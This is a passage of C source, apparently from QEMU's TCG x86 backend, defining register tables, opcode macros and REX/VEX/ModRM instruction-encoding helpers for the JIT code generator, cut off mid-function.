tcg_target_reg_names[TCG_TARGET_NB_REGS] = { #if TCG_TARGET_REG_BITS == 64 "%rax", "%rcx", "%rdx", "%rbx", "%rsp", "%rbp", "%rsi", "%rdi", #else "%eax", "%ecx", "%edx", "%ebx", "%esp", "%ebp", "%esi", "%edi", #endif "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%r15", "%xmm0", "%xmm1", "%xmm2", "%xmm3", "%xmm4", "%xmm5", "%xmm6", "%xmm7", #if TCG_TARGET_REG_BITS == 64 "%xmm8", "%xmm9", "%xmm10", "%xmm11", "%xmm12", "%xmm13", "%xmm14", "%xmm15", #endif }; #endif static const int tcg_target_reg_alloc_order[] = { #if TCG_TARGET_REG_BITS == 64 TCG_REG_RBP, TCG_REG_RBX, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, TCG_REG_R10, TCG_REG_R11, TCG_REG_R9, TCG_REG_R8, TCG_REG_RCX, TCG_REG_RDX, TCG_REG_RSI, TCG_REG_RDI, TCG_REG_RAX, #else TCG_REG_EBX, TCG_REG_ESI, TCG_REG_EDI, TCG_REG_EBP, TCG_REG_ECX, TCG_REG_EDX, TCG_REG_EAX, #endif TCG_REG_XMM0, TCG_REG_XMM1, TCG_REG_XMM2, TCG_REG_XMM3, TCG_REG_XMM4, TCG_REG_XMM5, #ifndef _WIN64 /* The Win64 ABI has xmm6-xmm15 as caller-saves, and we do not save any of them. Therefore only allow xmm0-xmm5 to be allocated. */ TCG_REG_XMM6, TCG_REG_XMM7, #if TCG_TARGET_REG_BITS == 64 TCG_REG_XMM8, TCG_REG_XMM9, TCG_REG_XMM10, TCG_REG_XMM11, TCG_REG_XMM12, TCG_REG_XMM13, TCG_REG_XMM14, TCG_REG_XMM15, #endif #endif }; static const int tcg_target_call_iarg_regs[] = { #if TCG_TARGET_REG_BITS == 64 #if defined(_WIN64) TCG_REG_RCX, TCG_REG_RDX, #else TCG_REG_RDI, TCG_REG_RSI, TCG_REG_RDX, TCG_REG_RCX, #endif TCG_REG_R8, TCG_REG_R9, #else /* 32 bit mode uses stack based calling convention (GCC default). */ #ifdef _MSC_VER 0, // MSVC needs dummy value to avoid empty array #endif #endif }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_EAX, #if TCG_TARGET_REG_BITS == 32 TCG_REG_EDX #endif }; /* Constants we accept. */ #define TCG_CT_CONST_S32 0x100 #define TCG_CT_CONST_U32 0x200 #define TCG_CT_CONST_I32 0x400 #define TCG_CT_CONST_WSZ 0x800 /* Registers used with L constraint, which are the first argument registers on x86_64, and two random call clobbered registers on i386. */ #if TCG_TARGET_REG_BITS == 64 # define TCG_REG_L0 tcg_target_call_iarg_regs[0] # define TCG_REG_L1 tcg_target_call_iarg_regs[1] #else # define TCG_REG_L0 TCG_REG_EAX # define TCG_REG_L1 TCG_REG_EDX #endif /* The host compiler should supply <cpuid.h> to enable runtime features detection, as we're not going to go so far as our own inline assembly. If not available, default values will be assumed. */ #if defined(CONFIG_CPUID_H) #include "qemu/cpuid.h" #endif /* For 64-bit, we always know that CMOV is available. */ #if TCG_TARGET_REG_BITS == 64 # define have_cmov 1 #elif defined(CONFIG_CPUID_H) static bool have_cmov; #else # define have_cmov 0 #endif /* We need these symbols in tcg-target.h, and we can't properly conditionalize it there. Therefore we always define the variable. */ bool have_bmi1; bool have_popcnt; bool have_avx1; bool have_avx2; #ifdef CONFIG_CPUID_H static bool have_movbe; static bool have_bmi2; static bool have_lzcnt; #else # define have_movbe 0 # define have_bmi2 0 # define have_lzcnt 0 #endif static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { value += addend; switch(type) { case R_386_PC32: value -= (uintptr_t)code_ptr; if (value != (int32_t)value) { return false; } /* FALLTHRU */ case R_386_32: tcg_patch32(code_ptr, value); break; case R_386_PC8: value -= (uintptr_t)code_ptr; if (value != (int8_t)value) { return false; } tcg_patch8(code_ptr, value); break; default: tcg_abort(); } return true; } #if TCG_TARGET_REG_BITS == 64 #define ALL_GENERAL_REGS 0x0000ffffu #define ALL_VECTOR_REGS 0xffff0000u #else #define ALL_GENERAL_REGS 0x000000ffu #define ALL_VECTOR_REGS 0x00ff0000u #endif /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch(*ct_str++) { case 'a': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EAX); break; case 'b': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EBX); break; case 'c': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_ECX); break; case 'd': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EDX); break; case 'S': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_ESI); break; case 'D': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EDI); break; case 'q': /* A register that can be used as a byte operand. */ ct->ct |= TCG_CT_REG; ct->u.regs = TCG_TARGET_REG_BITS == 64 ? 0xffff : 0xf; break; case 'Q': /* A register with an addressable second byte (e.g. %ah). */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xf; break; case 'r': /* A general register. */ ct->ct |= TCG_CT_REG; ct->u.regs |= ALL_GENERAL_REGS; break; case 'W': /* With TZCNT/LZCNT, we can have operand-size as an input. */ ct->ct |= TCG_CT_CONST_WSZ; break; case 'x': /* A vector register. */ ct->ct |= TCG_CT_REG; ct->u.regs |= ALL_VECTOR_REGS; break; /* qemu_ld/st address constraint */ case 'L': ct->ct |= TCG_CT_REG; ct->u.regs = TCG_TARGET_REG_BITS == 64 ? 0xffff : 0xff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_L0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_L1); break; case 'e': ct->ct |= (type == TCG_TYPE_I32 ? TCG_CT_CONST : TCG_CT_CONST_S32); break; case 'Z': ct->ct |= (type == TCG_TYPE_I32 ? TCG_CT_CONST : TCG_CT_CONST_U32); break; case 'I': ct->ct |= (type == TCG_TYPE_I32 ? TCG_CT_CONST : TCG_CT_CONST_I32); break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { return 1; } if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { return 1; } if ((ct & TCG_CT_CONST_I32) && ~val == (int32_t)~val) { return 1; } if ((ct & TCG_CT_CONST_WSZ) && val == (type == TCG_TYPE_I32 ? 32 : 64)) { return 1; } return 0; } # define LOWREGMASK(x) ((x) & 7) #define P_EXT 0x100 /* 0x0f opcode prefix */ #define P_EXT38 0x200 /* 0x0f 0x38 opcode prefix */ #define P_DATA16 0x400 /* 0x66 opcode prefix */ #if TCG_TARGET_REG_BITS == 64 # define P_REXW 0x1000 /* Set REX.W = 1 */ # define P_REXB_R 0x2000 /* REG field as byte register */ # define P_REXB_RM 0x4000 /* R/M field as byte register */ # define P_GS 0x8000 /* gs segment override */ #else # define P_REXW 0 # define P_REXB_R 0 # define P_REXB_RM 0 # define P_GS 0 #endif #define P_EXT3A 0x10000 /* 0x0f 0x3a opcode prefix */ #define P_SIMDF3 0x20000 /* 0xf3 opcode prefix */ #define P_SIMDF2 0x40000 /* 0xf2 opcode prefix */ #define P_VEXL 0x80000 /* Set VEX.L = 1 */ #define OPC_ARITH_EvIz (0x81) #define OPC_ARITH_EvIb (0x83) #define OPC_ARITH_GvEv (0x03) /* ... plus (ARITH_FOO << 3) */ #define OPC_ANDN (0xf2 | P_EXT38) #define OPC_ADD_GvEv (OPC_ARITH_GvEv | (ARITH_ADD << 3)) #define OPC_AND_GvEv (OPC_ARITH_GvEv | (ARITH_AND << 3)) #define OPC_BLENDPS (0x0c | P_EXT3A | P_DATA16) #define OPC_BSF (0xbc | P_EXT) #define OPC_BSR (0xbd | P_EXT) #define OPC_BSWAP (0xc8 | P_EXT) #define OPC_CALL_Jz (0xe8) #define OPC_CMOVCC (0x40 | P_EXT) /* ... plus condition code */ #define OPC_CMP_GvEv (OPC_ARITH_GvEv | (ARITH_CMP << 3)) #define OPC_DEC_r32 (0x48) #define OPC_IMUL_GvEv (0xaf | P_EXT) #define OPC_IMUL_GvEvIb (0x6b) #define OPC_IMUL_GvEvIz (0x69) #define OPC_INC_r32 (0x40) #define OPC_JCC_long (0x80 | P_EXT) /* ... plus condition code */ #define OPC_JCC_short (0x70) /* ... plus condition code */ #define OPC_JMP_long (0xe9) #define OPC_JMP_short (0xeb) #define OPC_LEA (0x8d) #define OPC_LZCNT (0xbd | P_EXT | P_SIMDF3) #define OPC_MOVB_EvGv (0x88) /* stores, more or less */ #define OPC_MOVL_EvGv (0x89) /* stores, more or less */ #define OPC_MOVL_GvEv (0x8b) /* loads, more or less */ #define OPC_MOVB_EvIz (0xc6) #define OPC_MOVL_EvIz (0xc7) #define OPC_MOVL_Iv (0xb8) #define OPC_MOVBE_GyMy (0xf0 | P_EXT38) #define OPC_MOVBE_MyGy (0xf1 | P_EXT38) #define OPC_MOVD_VyEy (0x6e | P_EXT | P_DATA16) #define OPC_MOVD_EyVy (0x7e | P_EXT | P_DATA16) #define OPC_MOVDDUP (0x12 | P_EXT | P_SIMDF2) #define OPC_MOVDQA_VxWx (0x6f | P_EXT | P_DATA16) #define OPC_MOVDQA_WxVx (0x7f | P_EXT | P_DATA16) #define OPC_MOVDQU_VxWx (0x6f | P_EXT | P_SIMDF3) #define OPC_MOVDQU_WxVx (0x7f | P_EXT | P_SIMDF3) #define OPC_MOVQ_VqWq (0x7e | P_EXT | P_SIMDF3) #define OPC_MOVQ_WqVq (0xd6 | P_EXT | P_DATA16) #define OPC_MOVSBL (0xbe | P_EXT) #define OPC_MOVSWL (0xbf | P_EXT) #define OPC_MOVSLQ (0x63 | P_REXW) #define OPC_MOVZBL (0xb6 | P_EXT) #define OPC_MOVZWL (0xb7 | P_EXT) #define OPC_PABSB (0x1c | P_EXT38 | P_DATA16) #define OPC_PABSW (0x1d | P_EXT38 | P_DATA16) #define OPC_PABSD (0x1e | P_EXT38 | P_DATA16) #define OPC_PACKSSDW (0x6b | P_EXT | P_DATA16) #define OPC_PACKSSWB (0x63 | P_EXT | P_DATA16) #define OPC_PACKUSDW (0x2b | P_EXT38 | P_DATA16) #define OPC_PACKUSWB (0x67 | P_EXT | P_DATA16) #define OPC_PADDB (0xfc | P_EXT | P_DATA16) #define OPC_PADDW (0xfd | P_EXT | P_DATA16) #define OPC_PADDD (0xfe | P_EXT | P_DATA16) #define OPC_PADDQ (0xd4 | P_EXT | P_DATA16) #define OPC_PADDSB (0xec | P_EXT | P_DATA16) #define OPC_PADDSW (0xed | P_EXT | P_DATA16) #define OPC_PADDUB (0xdc | P_EXT | P_DATA16) #define OPC_PADDUW (0xdd | P_EXT | P_DATA16) #define OPC_PAND (0xdb | P_EXT | P_DATA16) #define OPC_PANDN (0xdf | P_EXT | P_DATA16) #define OPC_PBLENDW (0x0e | P_EXT3A | P_DATA16) #define OPC_PCMPEQB (0x74 | P_EXT | P_DATA16) #define OPC_PCMPEQW (0x75 | P_EXT | P_DATA16) #define OPC_PCMPEQD (0x76 | P_EXT | P_DATA16) #define OPC_PCMPEQQ (0x29 | P_EXT38 | P_DATA16) #define OPC_PCMPGTB (0x64 | P_EXT | P_DATA16) #define OPC_PCMPGTW (0x65 | P_EXT | P_DATA16) #define OPC_PCMPGTD (0x66 | P_EXT | P_DATA16) #define OPC_PCMPGTQ (0x37 | P_EXT38 | P_DATA16) #define OPC_PMAXSB (0x3c | P_EXT38 | P_DATA16) #define OPC_PMAXSW (0xee | P_EXT | P_DATA16) #define OPC_PMAXSD (0x3d | P_EXT38 | P_DATA16) #define OPC_PMAXUB (0xde | P_EXT | P_DATA16) #define OPC_PMAXUW (0x3e | P_EXT38 | P_DATA16) #define OPC_PMAXUD (0x3f | P_EXT38 | P_DATA16) #define OPC_PMINSB (0x38 | P_EXT38 | P_DATA16) #define OPC_PMINSW (0xea | P_EXT | P_DATA16) #define OPC_PMINSD (0x39 | P_EXT38 | P_DATA16) #define OPC_PMINUB (0xda | P_EXT | P_DATA16) #define OPC_PMINUW (0x3a | P_EXT38 | P_DATA16) #define OPC_PMINUD (0x3b | P_EXT38 | P_DATA16) #define OPC_PMOVSXBW (0x20 | P_EXT38 | P_DATA16) #define OPC_PMOVSXWD (0x23 | P_EXT38 | P_DATA16) #define OPC_PMOVSXDQ (0x25 | P_EXT38 | P_DATA16) #define OPC_PMOVZXBW (0x30 | P_EXT38 | P_DATA16) #define OPC_PMOVZXWD (0x33 | P_EXT38 | P_DATA16) #define OPC_PMOVZXDQ (0x35 | P_EXT38 | P_DATA16) #define OPC_PMULLW (0xd5 | P_EXT | P_DATA16) #define OPC_PMULLD (0x40 | P_EXT38 | P_DATA16) #define OPC_POR (0xeb | P_EXT | P_DATA16) #define OPC_PSHUFB (0x00 | P_EXT38 | P_DATA16) #define OPC_PSHUFD (0x70 | P_EXT | P_DATA16) #define OPC_PSHUFLW (0x70 | P_EXT | P_SIMDF2) #define OPC_PSHUFHW (0x70 | P_EXT | P_SIMDF3) #define OPC_PSHIFTW_Ib (0x71 | P_EXT | P_DATA16) /* /2 /6 /4 */ #define OPC_PSHIFTD_Ib (0x72 | P_EXT | P_DATA16) /* /2 /6 /4 */ #define OPC_PSHIFTQ_Ib (0x73 | P_EXT | P_DATA16) /* /2 /6 /4 */ #define OPC_PSLLW (0xf1 | P_EXT | P_DATA16) #define OPC_PSLLD (0xf2 | P_EXT | P_DATA16) #define OPC_PSLLQ (0xf3 | P_EXT | P_DATA16) #define OPC_PSRAW (0xe1 | P_EXT | P_DATA16) #define OPC_PSRAD (0xe2 | P_EXT | P_DATA16) #define OPC_PSRLW (0xd1 | P_EXT | P_DATA16) #define OPC_PSRLD (0xd2 | P_EXT | P_DATA16) #define OPC_PSRLQ (0xd3 | P_EXT | P_DATA16) #define OPC_PSUBB (0xf8 | P_EXT | P_DATA16) #define OPC_PSUBW (0xf9 | P_EXT | P_DATA16) #define OPC_PSUBD (0xfa | P_EXT | P_DATA16) #define OPC_PSUBQ (0xfb | P_EXT | P_DATA16) #define OPC_PSUBSB (0xe8 | P_EXT | P_DATA16) #define OPC_PSUBSW (0xe9 | P_EXT | P_DATA16) #define OPC_PSUBUB (0xd8 | P_EXT | P_DATA16) #define OPC_PSUBUW (0xd9 | P_EXT | P_DATA16) #define OPC_PUNPCKLBW (0x60 | P_EXT | P_DATA16) #define OPC_PUNPCKLWD (0x61 | P_EXT | P_DATA16) #define OPC_PUNPCKLDQ (0x62 | P_EXT | P_DATA16) #define OPC_PUNPCKLQDQ (0x6c | P_EXT | P_DATA16) #define OPC_PUNPCKHBW (0x68 | P_EXT | P_DATA16) #define OPC_PUNPCKHWD (0x69 | P_EXT | P_DATA16) #define OPC_PUNPCKHDQ (0x6a | P_EXT | P_DATA16) #define OPC_PUNPCKHQDQ (0x6d | P_EXT | P_DATA16) #define OPC_PXOR (0xef | P_EXT | P_DATA16) #define OPC_POP_r32 (0x58) #define OPC_POPCNT (0xb8 | P_EXT | P_SIMDF3) #define OPC_PUSH_r32 (0x50) #define OPC_PUSH_Iv (0x68) #define OPC_PUSH_Ib (0x6a) #define OPC_RET (0xc3) #define OPC_SETCC (0x90 | P_EXT | P_REXB_RM) /* ... plus cc */ #define OPC_SHIFT_1 (0xd1) #define OPC_SHIFT_Ib (0xc1) #define OPC_SHIFT_cl (0xd3) #define OPC_SARX (0xf7 | P_EXT38 | P_SIMDF3) #define OPC_SHUFPS (0xc6 | P_EXT) #define OPC_SHLX (0xf7 | P_EXT38 | P_DATA16) #define OPC_SHRX (0xf7 | P_EXT38 | P_SIMDF2) #define OPC_SHRD_Ib (0xac | P_EXT) #define OPC_TESTL (0x85) #define OPC_TZCNT (0xbc | P_EXT | P_SIMDF3) #define OPC_UD2 (0x0b | P_EXT) #define OPC_VPBLENDD (0x02 | P_EXT3A | P_DATA16) #define OPC_VPBLENDVB (0x4c | P_EXT3A | P_DATA16) #define OPC_VPINSRB (0x20 | P_EXT3A | P_DATA16) #define OPC_VPINSRW (0xc4 | P_EXT | P_DATA16) #define OPC_VBROADCASTSS (0x18 | P_EXT38 | P_DATA16) #define OPC_VBROADCASTSD (0x19 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTB (0x78 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTW (0x79 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTD (0x58 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTQ (0x59 | P_EXT38 | P_DATA16) #define OPC_VPERMQ (0x00 | P_EXT3A | P_DATA16 | P_REXW) #define OPC_VPERM2I128 (0x46 | P_EXT3A | P_DATA16 | P_VEXL) #define OPC_VPSLLVD (0x47 | P_EXT38 | P_DATA16) #define OPC_VPSLLVQ (0x47 | P_EXT38 | P_DATA16 | P_REXW) #define OPC_VPSRAVD (0x46 | P_EXT38 | P_DATA16) #define OPC_VPSRLVD (0x45 | P_EXT38 | P_DATA16) #define OPC_VPSRLVQ (0x45 | P_EXT38 | P_DATA16 | P_REXW) #define OPC_VZEROUPPER (0x77 | P_EXT) #define OPC_XCHG_ax_r32 (0x90) #define OPC_GRP3_Ev (0xf7) #define OPC_GRP5 (0xff) #define OPC_GRP14 (0x73 | P_EXT | P_DATA16) /* Group 1 opcode extensions for 0x80-0x83. These are also used as modifiers for OPC_ARITH. */ #define ARITH_ADD 0 #define ARITH_OR 1 #define ARITH_ADC 2 #define ARITH_SBB 3 #define ARITH_AND 4 #define ARITH_SUB 5 #define ARITH_XOR 6 #define ARITH_CMP 7 /* Group 2 opcode extensions for 0xc0, 0xc1, 0xd0-0xd3. */ #define SHIFT_ROL 0 #define SHIFT_ROR 1 #define SHIFT_SHL 4 #define SHIFT_SHR 5 #define SHIFT_SAR 7 /* Group 3 opcode extensions for 0xf6, 0xf7. To be used with OPC_GRP3. */ #define EXT3_NOT 2 #define EXT3_NEG 3 #define EXT3_MUL 4 #define EXT3_IMUL 5 #define EXT3_DIV 6 #define EXT3_IDIV 7 /* Group 5 opcode extensions for 0xff. To be used with OPC_GRP5. */ #define EXT5_INC_Ev 0 #define EXT5_DEC_Ev 1 #define EXT5_CALLN_Ev 2 #define EXT5_JMPN_Ev 4 /* Condition codes to be added to OPC_JCC_{long,short}. */ #define JCC_JMP (-1) #define JCC_JO 0x0 #define JCC_JNO 0x1 #define JCC_JB 0x2 #define JCC_JAE 0x3 #define JCC_JE 0x4 #define JCC_JNE 0x5 #define JCC_JBE 0x6 #define JCC_JA 0x7 #define JCC_JS 0x8 #define JCC_JNS 0x9 #define JCC_JP 0xa #define JCC_JNP 0xb #define JCC_JL 0xc #define JCC_JGE 0xd #define JCC_JLE 0xe #define JCC_JG 0xf static const uint8_t tcg_cond_to_jcc[] = { [TCG_COND_EQ] = JCC_JE, [TCG_COND_NE] = JCC_JNE, [TCG_COND_LT] = JCC_JL, [TCG_COND_GE] = JCC_JGE, [TCG_COND_LE] = JCC_JLE, [TCG_COND_GT] = JCC_JG, [TCG_COND_LTU] = JCC_JB, [TCG_COND_GEU] = JCC_JAE, [TCG_COND_LEU] = JCC_JBE, [TCG_COND_GTU] = JCC_JA, }; #if TCG_TARGET_REG_BITS == 64 static void tcg_out_opc(TCGContext *s, int opc, int r, int rm, int x) { int rex; if (opc & P_GS) { tcg_out8(s, 0x65); } if (opc & P_DATA16) { /* We should never be asking for both 16 and 64-bit operation. */ tcg_debug_assert((opc & P_REXW) == 0); tcg_out8(s, 0x66); } if (opc & P_SIMDF3) { tcg_out8(s, 0xf3); } else if (opc & P_SIMDF2) { tcg_out8(s, 0xf2); } rex = 0; rex |= (opc & P_REXW) ? 0x8 : 0x0; /* REX.W */ rex |= (r & 8) >> 1; /* REX.R */ rex |= (x & 8) >> 2; /* REX.X */ rex |= (rm & 8) >> 3; /* REX.B */ /* P_REXB_{R,RM} indicates that the given register is the low byte. For %[abcd]l we need no REX prefix, but for %{si,di,bp,sp}l we do, as otherwise the encoding indicates %[abcd]h. Note that the values that are ORed in merely indicate that the REX byte must be present; those bits get discarded in output. */ rex |= opc & (r >= 4 ? P_REXB_R : 0); rex |= opc & (rm >= 4 ? P_REXB_RM : 0); if (rex) { tcg_out8(s, (uint8_t)(rex | 0x40)); } if (opc & (P_EXT | P_EXT38 | P_EXT3A)) { tcg_out8(s, 0x0f); if (opc & P_EXT38) { tcg_out8(s, 0x38); } else if (opc & P_EXT3A) { tcg_out8(s, 0x3a); } } tcg_out8(s, opc); } #else static void tcg_out_opc(TCGContext *s, int opc) { if (opc & P_DATA16) { tcg_out8(s, 0x66); } if (opc & P_SIMDF3) { tcg_out8(s, 0xf3); } else if (opc & P_SIMDF2) { tcg_out8(s, 0xf2); } if (opc & (P_EXT | P_EXT38 | P_EXT3A)) { tcg_out8(s, 0x0f); if (opc & P_EXT38) { tcg_out8(s, 0x38); } else if (opc & P_EXT3A) { tcg_out8(s, 0x3a); } } tcg_out8(s, opc); } /* Discard the register arguments to tcg_out_opc early, so as not to penalize the 32-bit compilation paths. This method works with all versions of gcc, whereas relying on optimization may not be able to exclude them. */ #define tcg_out_opc(s, opc, r, rm, x) (tcg_out_opc)(s, opc) #endif static void tcg_out_modrm(TCGContext *s, int opc, int r, int rm) { tcg_out_opc(s, opc, r, rm, 0); tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); } static void tcg_out_vex_opc(TCGContext *s, int opc, int r, int v, int rm, int index) { int tmp = 0; /* Use the two byte form if possible, which cannot encode VEX.W, VEX.B, VEX.X, or an m-mmmm field other than P_EXT. */ if ((opc & (P_EXT | P_EXT38 | P_EXT3A | P_REXW)) == P_EXT && ((rm | index) & 8) == 0) { /* Two byte VEX prefix. */ tcg_out8(s, 0xc5); tmp = (r & 8 ? 0 : 0x80); /* VEX.R */ } else { /* Three byte VEX prefix. */ tcg_out8(s, 0xc4); /* VEX.m-mmmm */ if (opc & P_EXT3A) { tmp = 3; } else if (opc & P_EXT38) { tmp = 2; } else if (opc & P_EXT) { tmp = 1; } else { g_assert_not_reached(); } tmp |= (r & 8 ? 0 : 0x80); /* VEX.R */ tmp |= (index & 8 ? 0 : 0x40); /* VEX.X */ tmp |= (rm & 8 ? 0 : 0x20); /* VEX.B */ tcg_out8(s, tmp); tmp = (opc & P_REXW ? 0x80 : 0); /* VEX.W */ } tmp |= (opc & P_VEXL ? 0x04 : 0); /* VEX.L */ /* VEX.pp */ if (opc & P_DATA16) { tmp |= 1; /* 0x66 */ } else if (opc & P_SIMDF3) { tmp |= 2; /* 0xf3 */ } else if (opc & P_SIMDF2) { tmp |= 3; /* 0xf2 */ } tmp |= (~v & 15) << 3; /* VEX.vvvv */ tcg_out8(s, tmp); tcg_out8(s, opc); } static void tcg_out_vex_modrm(TCGContext *s, int opc, int r, int v, int rm) { tcg_out_vex_opc(s, opc, r, v, rm, 0); tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); } /* Output an opcode with a full "rm + (index<<shift) + offset" address mode. We handle either RM and INDEX missing with a negative value. In 64-bit mode for absolute addresses, ~RM is the size of the immediate operand that will follow the instruction. */ static void tcg_out_sib_offset(TCGContext *s, int r, int rm, int index, int shift, intptr_t offset) { int mod, len; if (index < 0 && rm < 0) { if (TCG_TARGET_REG_BITS == 64) { /* Try for a rip-relative addressing mode. This has replaced the 32-bit-mode absolute addressing encoding. */ intptr_t pc = (intptr_t)s->code_ptr + 5 + ~rm; intptr_t disp = offset - pc; if (disp == (int32_t)disp) { tcg_out8(s, (LOWREGMASK(r) << 3) | 5); tcg_out32(s, disp); return; } /* Try for an absolute address encoding. This requires the use of the MODRM+SIB encoding and is therefore larger than rip-relative addressing. */ if (offset == (int32_t)offset) { tcg_out8(s, (LOWREGMASK(r) << 3) | 4); tcg_out8(s, (4 << 3) | 5); tcg_out32(s, offset); return; } /* ??? The memory isn't directly addressable. */ g_assert_not_reached(); } else { /* Absolute address. */ tcg_out8(s, (r << 3) | 5); tcg_out32(s, offset); return; } } /* Find the length of the immediate addend. Note that the encoding that would be used for (%ebp) indicates absolute addressing. */ if (rm < 0) { mod = 0, len = 4, rm = 5; } else if (offset == 0 && LOWREGMASK(rm) != TCG_REG_EBP) { mod = 0, len = 0; } else if (offset == (int8_t)offset) { mod = 0x40, len = 1; } else { mod = 0x80, len = 4; } /* Use a single byte MODRM format if possible. Note that the encoding that would be used for %esp is the escape to the two byte form. */ if (index < 0 && LOWREGMASK(rm) != TCG_REG_ESP) { /* Single byte MODRM format. */ tcg_out8(s, mod | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); } else { /* Two byte MODRM+SIB format. */ /* Note that the encoding that would place %esp into the index field indicates no index register. In 64-bit mode, the REX.X bit counts, so %r12 can be used as the index. */ if (index < 0) { index = 4; } else { tcg_debug_assert(index != TCG_REG_ESP); } tcg_out8(s, mod | (LOWREGMASK(r) << 3) | 4); tcg_out8(s, (shift << 6) | (LOWREGMASK(index) << 3) | LOWREGMASK(rm)); } if (len == 1) { tcg_out8(s, offset); } else if (len == 4) { tcg_out32(s, offset); } } static void tcg_out_modrm_sib_offset(TCGContext *s, int opc, int r, int rm, int index, int shift, intptr_t offset) { tcg_out_opc(s, opc, r, rm < 0 ? 0 : rm, index < 0 ? 0 : index); tcg_out_sib_offset(s, r, rm, index, shift, offset); } static void tcg_out_vex_modrm_sib_offset(TCGContext *s, int opc, int r, int v, int rm, int index, int shift, intptr_t offset) { tcg_out_vex_opc(s, opc, r, v, rm < 0 ? 0 : rm, index < 0 ? 0 : index); tcg_out_sib_offset(s, r, rm, index, shift, offset); } /* A simplification of the above with no index or shift. */ static inline void tcg_out_modrm_offset(TCGContext *s, int opc, int r, int rm, intptr_t offset) { tcg_out_modrm_sib_offset(s, opc, r, rm, -1, 0, offset); } static inline void tcg_out_vex_modrm_offset(TCGContext *s, int opc, int r, int v, int rm, intptr_t offset) { tcg_out_vex_modrm_sib_offset(s, opc, r, v, rm, -1, 0, offset); } /* Output an opcode with an expected reference to the constant pool. */ static inline void tcg_out_modrm_pool(TCGContext *s, int opc, int r) { tcg_out_opc(s, opc, r, 0, 0); /* Absolute for 32-bit, pc-relative for 64-bit. */ tcg_out8(s, LOWREGMASK(r) << 3 | 5); tcg_out32(s, 0); } /* Output an opcode with an expected reference to the constant pool. */ static inline void tcg_out_vex_modrm_pool(TCGContext *s, int opc, int r) { tcg_out_vex_opc(s, opc, r, 0, 0, 0); /* Absolute for 32-bit, pc-relative for 64-bit. */ tcg_out8(s, LOWREGMASK(r) << 3 | 5); tcg_out32(s, 0); } /* Generate dest op= src. Uses the same ARITH_* codes as tgen_arithi. */ static inline void tgen_arithr(TCGContext *s, int subop, int dest, int src) { /* Propagate an opcode prefix, such as P_REXW. */ int ext = subop & ~0x7; subop &= 0x7; tcg_out_modrm(s, OPC_ARITH_GvEv + (subop << 3) + ext, dest, src); } static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { int rexw = 0; if (arg == ret) { return true; } switch (type) { case TCG_TYPE_I64: rexw = P_REXW; /* fallthru */ case TCG_TYPE_I32: if (ret < 16) { if (arg < 16) { tcg_out_modrm(s, OPC_MOVL_GvEv + rexw, ret, arg); } else { tcg_out_vex_modrm(s, OPC_MOVD_EyVy + rexw, arg, 0, ret); } } else { if (arg < 16) { tcg_out_vex_modrm(s, OPC_MOVD_VyEy + rexw, ret, 0, arg); } else { tcg_out_vex_modrm(s, OPC_MOVQ_VqWq, ret, 0, arg); } } break; case TCG_TYPE_V64: tcg_debug_assert(ret >= 16 && arg >= 16); tcg_out_vex_modrm(s, OPC_MOVQ_VqWq, ret, 0, arg); break; case TCG_TYPE_V128: tcg_debug_assert(ret >= 16 && arg >= 16); tcg_out_vex_modrm(s, OPC_MOVDQA_VxWx, ret, 0, arg); break; case TCG_TYPE_V256: tcg_debug_assert(ret >= 16 && arg >= 16); tcg_out_vex_modrm(s, OPC_MOVDQA_VxWx | P_VEXL, ret, 0, arg); break; default: g_assert_not_reached(); } return true; } static const int avx2_dup_insn[4] = { OPC_VPBROADCASTB, OPC_VPBROADCASTW, OPC_VPBROADCASTD, OPC_VPBROADCASTQ, }; static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg r, TCGReg a) { if (have_avx2) { int vex_l = (type == TCG_TYPE_V256 ? P_VEXL : 0); tcg_out_vex_modrm(s, avx2_dup_insn[vece] + vex_l, r, 0, a); } else { switch (vece) { case MO_8: /* ??? With zero in a register, use PSHUFB. */ tcg_out_vex_modrm(s, OPC_PUNPCKLBW, r, a, a); a = r; /* FALLTHRU */ case MO_16: tcg_out_vex_modrm(s, OPC_PUNPCKLWD, r, a, a); a = r; /* FALLTHRU */ case MO_32: tcg_out_vex_modrm(s, OPC_PSHUFD, r, 0, a); /* imm8 operand: all output lanes selected from input lane 0. */ tcg_out8(s, 0); break; case MO_64: tcg_out_vex_modrm(s, OPC_PUNPCKLQDQ, r, a, a); break; default: g_assert_not_reached(); } } return true; } static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg r, TCGReg base, intptr_t offset) { if (have_avx2) { int vex_l = (type == TCG_TYPE_V256 ? P_VEXL : 0); tcg_out_vex_modrm_offset(s, avx2_dup_insn[vece] + vex_l, r, 0, base, offset); } else { switch (vece) { case MO_64: 